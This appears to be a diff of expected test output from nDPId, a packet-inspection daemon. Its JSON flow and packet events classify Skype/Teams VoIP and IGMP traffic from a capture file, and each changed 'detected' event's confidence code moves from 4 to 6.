+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xIYAAEAR1JLAqAEinTeCmDLdnFYAJvNGe1cC+NCgg6iFX83BbHq4v+mwzzHLJiFQXcBRQbw9"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431970662914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970662914,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+nlYAAEARkRrAqAEi1cezrDLdnEsAKjxNe1kCd7pyWFY\/2XtrOx7QzlcFNoQgfV3dFZmCGAMb34HK5w=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431970662914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970662914,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3jiIAAEAR0y7AqAEiQAQXlzLdnF0AI+cqe1sCynRK6RblWzdW13\/d3OH7SI3y+M61XQ85"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3FyoAAEARSg7AqAEiQAQXsDLdnEEAI4rRe10CzbovR94s4Zxf8rLQnBsqBqSn7dHSA+Hg"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6rCQAAEAR7PjAqAEinTeClDLdnFMAJgbKe18CYcW5TKiM44ghnCPOJzkfQkjh9HCzfXzFFif7"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8YPIAAEARzyHAqAEinTfrmzLdnFsAKKqoe2ECDwqATU5QUcdDsP2+OoC0sJan4F5erjlhYCY+cbA="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431970664361,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431970664361,"pkt":"AQBeAAABoPPBbTu2CABGwAAgAAAAAAECgnDAqAD+4AAAAZQEAAARZO6bAAAAAA=="} -00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431970664698,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431970664698,"pkt":"PBXCt3IOtPCr0yf4CABGAAAg8JwAAAECkLLAqAHl4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"} -00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431970664878,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970664878,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kL8AAEARaq3AqAEib91NmjLdnFEAK0H5e2MCFDnpGlF82iGY4eNpUibWNoDaPXvzzVnf0YiL6zK2YSk="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431970664878,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970664878,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5Q+cAAEARHWrAqAEiQAQXlTLdnF4AJXN2e2UCDFA+Qxh89YvJZEs857N5H5uVs05hCuMkyAI="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyYRMAAEARmlXAqAEib91NqzLdnF4AHu9ce2cCLa6FGK\/rw+WZJkTZL2SD2CNvhA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 